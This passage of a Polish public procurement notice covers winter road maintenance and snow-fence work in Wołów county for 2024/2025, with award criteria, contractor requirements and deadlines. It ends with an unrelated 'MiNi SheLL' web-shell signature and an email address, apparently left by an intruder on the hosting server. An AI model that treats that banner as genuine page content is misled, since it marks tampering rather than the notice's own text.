Rp<br/><br/>	Kryterium to będzie rozpatrywane na podstawie ilości godzin zadeklarowanej przez wykonawcę w ofercie.<br/>	Czas rozpoczęcia pracy przy ZUD przez jednostki sprzętowe oznacza czas na załadunek i dojazd do miejsca rozpoczęcia akcji. <br/>W ww. kryterium można uzyskać maksymalnie 40 pkt, a ocena punktowa zostanie dokonana na podstawie deklaracji wykonawcy złożonej w ofercie i tak:<br/><br/>Czas rozpoczęcia pracy przy ZUD przez jednostkę sprzętową Ilość punktów<br/>1,0 godzina 40<br/>1,5 godziny 20<br/>2,0 godziny 0<br/><br/>W przypadku, gdy wszyscy Wykonawcy zaproponują jednakową wartość, wszyscy otrzymają liczbę punktów w danym kryterium. <br/> <br/>UWAGA: <br/>-W przypadku nie usunięcia/nie przekreślenia dwóch z podanych trzech terminów rozpoczęcia pracy w formularzu oferty, zamawiający przyjmie do oceny najdłuższy czas rozpoczęcia pracy tj. 2,0 godziny a wykonawca w tym kryterium otrzyma 0 pkt.<br/>-W przypadku pozostawienia bez usunięcia/bez przekreślenia wszystkich (trzech) terminów rozpoczęcia pracy w formularzu oferty, zamawiający przyjmie do oceny najdłuższy czas rozpoczęcia pracy tj. 2,0 godziny a wykonawca w tym kryterium otrzyma 0 pkt.<br/>-W przypadku usunięcia/przekreślenia wszystkich (trzech) terminów rozpoczęcia pracy w formularzu oferty, zamawiający odrzuci ofertę wykonawcy, zgodnie z art. 226 ust. 1 pkt 5 ustawy Pzp. <br/><br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas rozpoczęcia pracy przy ZUD przez jednostkę transportową” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>2.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>3.	Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu rozpoczęcia pracy, zamawiający spośród tych ofert wybierze ofertę z najniższą ceną jednostkową za środki sprzętowo-transportowe do odśnieżania i usuwania śliskości zimowej (pługo-piaskarka), a jeżeli zostaną złożone oferty o takiej samej cenie, zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia pracy przy ZUD (odśnieżanie i zwalczanie śliskości) przez jednostkę sprzętową</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczeniem usług związanych z zimowym utrzymaniem dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie 2024/2025 z podziałem na zadania (części), w ramach bieżącego utrzymania dróg.<br/><br/>zadanie nr 3 – montaż i demontaż siatki przeciwśnieżnej DW 338 <br/>-lokalizacja – odcinek DW 338 miedzy m. Mojęcice a m. Kątami<br/>-długość siatki – 2,1 km (siatka Zamawiającego)<br/>-paliki drewniane i drut naciągowy Wykonawcy<br/><br/>Szczegółowy zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają: <br/>1)	Opis Przedmiotu Zamówienia – załącznik nr 6 do SWZ, <br/>2)	Projekt umowy stanowiący załącznik nr 8 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla zadania nr 3 zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty (z podatkiem VAT)	60% = 60 pkt<br/>2.	Czas reakcji w celu naprawienia uszkodzonej siatki i palików 40% = 40 pkt<br/><br/>Kryterium „CENA”:<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia (zadania) wpisanej przez wykonawcę w formularzu oferty, na podstawie kosztorysu ofertowego.<br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>	C = (C min / C bad) x 60 pkt<br/> gdzie: <br/> C – ilość punktów przyznana ofercie za kryterium „Cena”<br/> C min – wartość brutto przedstawiona w najkorzystniejszej pod tym względem ofercie, czyli najniższa <br/> cena brutto spośród ofert nieodrzuconych<br/>C bad – cena brutto w badanej ofercie<br/><br/>Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>Kryterium „CZAS REAKCJI W CELU NAPRAWIENIA USZKODZONEJ SIATKI I PALIKÓW”<br/>	Kryterium to będzie rozpatrywane na podstawie długości czasu reakcji wykonawcy na wezwanie zamawiającego w celu naprawienia uszkodzonej siatki przeciwśieżnej lub palików, zadeklarowanej przez wykonawcę w ofercie.<br/><br/>W ww. kryterium można uzyskać maksymalnie 40 pkt, a ocena punktowa zostanie dokonana na podstawie deklaracji wykonawcy złożonej w ofercie i tak:<br/><br/><br/>Czas reakcji w celu naprawienia uszkodzonej siatki lub palików	Ilość punktów<br/>12 godzin 40<br/>24 godziny 20<br/>36 godzin 0<br/>Maksymalny czas reakcji w celu naprawienia uszkodzeń, wymagany przez zamawiającego: 48 godzin. Minimalny czas reakcji w celu naprawienia uszkodzeń, wymagany przez zamawiającego: 24 godziny. <br/><br/><br/>UWAGA: <br/>-W przypadku nie usunięcia/nie przekreślenia dwóch z podanych trzech czasów reakcji w celu naprawienia uszkodzonej siatki lub palików w formularzu oferty, zamawiający przyjmie do oceny najdłuższy czas reakcji tj. 36 godzin a wykonawca w tym kryterium otrzyma 0 pkt.<br/>-W przypadku pozostawienia bez usunięcia/bez przekreślenia wszystkich (trzech) czasów reakcji w celu naprawienia uszkodzonej siatki i palików w formularzu oferty, zamawiający przyjmie do oceny najdłuższy czas reakcji tj. 36 godzin a wykonawca w tym kryterium otrzyma 0 pkt.<br/>-W przypadku usunięcia/przekreślenia wszystkich (trzech) czasów reakcji w celu naprawienia uszkodzonej siatki i palików w formularzu oferty, zamawiający odrzuci ofertę wykonawcy, zgodnie z art. 226 ust. 1 pkt 5 ustawy Pzp. <br/><br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas reakcji w celu naprawienia uszkodzonej siatki i palików” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji w celu naprawienia uszkodzonej siatki i palików</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez zamawiającego warunki udziału w postępowaniu, zgodnie z art. 112 ust. 2 ustawy, dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>A.	Zamawiający wymaga, aby wykonawca nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał ca najmniej:<br/>-jedną usługę związaną z wykonywaniem prac polegających na zimowym utrzymaniu dróg publicznych w okresie jednego sezonu zimowego o wartości minimum 100.000,00 zł brutto, należycie wykonaną (dla zadania 1 i 2, niezależnie od ilości oferowanych zadań)<br/>-jedną usługę związaną z montażem i demontażem siatki przeciwśnieżnej wykonaną w okresie jednego sezonu zimowego o wartości minimum 30.000,00 zł brutto, należycie wykonaną (dla zadania 3)<br/><br/>B.	Zamawiający wymaga, aby wykonawca dysponował minimum wymienionymi poniżej jednostkami sprzętowo-transportowymi:<br/>-dwoma samochodami (nośnikami) z zamontowaną piaskarką (min. 6,0 m3) i pługiem odśnieżnym min. średnim – dla zadania 1,<br/>-dwoma samochodami (nośnikami) z zamontowaną piaskarką (min. 6,0 m3) i pługiem odśnieżnym min. średnim – dla zadania 2,<br/>-jednym pojazdem samochodowym lub ciągnikiem rolniczym – dla zadania 3.<br/><br/>W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie przepisów, o których mowa w art. 108 ust. 1 pkt 1) – 6) i art. 109 ust. 1 pkt 4 ustawy oraz w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz spełnia warunki udziału w postępowaniu, do oferty musi dołączyć aktualne na dzień składania ofert Oświadczenie Wykonawcy składane na podstawie art. 125 ust 1 ustawy Pzp, w zakresie wskazanym przez zamawiającego w załączniku nr 2 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty składane przez wykonawcę wraz z ofertą:<br/>1)	Formularz ofertowy wraz z formularzem cenotwórczym – załącznik nr 1 do SWZ.<br/>2)	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, w przypadku o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp, wykonawcy składają Oświadczenie, z którego wynika, które usługi, wykonują poszczególni Wykonawcy – załącznik nr 4 do SWZ .<br/>3)	Zobowiązanie podmiotu trzeciego do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby – załączniki nr 5 do SWZ (jeżeli dotyczy).<br/>4)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy, jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskaże w Formularzu ofertowym, dane umożliwiające dostęp do tych dokumentów;<br/>5)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy – jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 2) powyżej. Postanowienie niniejsze stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy. Pełnomocnictwo winno być udzielone przez osobę uprawnioną do reprezentowania odpowiednio wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego lub podmiotu udostępniającego zasoby oraz złożone w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie elektronicznej kopii pełnomocnictwa, poświadczonej podpisem zaufanym lub podpisem osobistym przez notariusza. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego<br/>6)	pełnomocnictwo w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być udzielone przez wszystkich wykonawców wchodzących w skład konsorcjum lub spółki cywilnej oraz złożone w formie elektronicznej lub postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale 5 ust. 1 SWZ, składa każdy z wykonawców (załącznik nr 2). Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (załącznik nr 4). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Istotne postanowienia umowy zawarte zostały w projekcie umowy, stanowiącym załącznik nr 8 do SWZ. <br/>2.	Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy. Zakres oraz warunki dopuszczalnych zmian umowy zawarte są w projekcie umowy.<br/>3.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy.<br/>4.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: https://platformazakupowa.pl/pn/powiatwolowski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-03</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena

Creat By MiNi SheLL
Email: jattceo@gmail.com